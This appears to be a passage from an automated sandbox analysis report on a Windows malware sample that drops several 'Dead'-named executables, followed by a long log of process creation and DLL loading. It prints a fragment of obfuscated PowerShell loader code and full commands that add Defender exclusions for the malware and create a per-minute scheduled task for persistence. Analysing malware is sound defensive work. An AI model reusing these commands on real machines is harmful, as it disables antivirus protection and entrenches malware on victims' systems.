+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66}
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\DeadXClient.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\Public\Deadsvchost.exe C:\Users\Public\Deadsvchost.exe
Source: unknown Process created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe"
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DeadROOTkit.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe"
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe" Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe" Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe" Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe" Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe' Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DeadROOTkit.exe' Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe" Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66} Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe Section loaded: pdh.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: mscoree.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: apphelp.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: version.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: sspicli.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: mscoree.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: version.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: sspicli.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
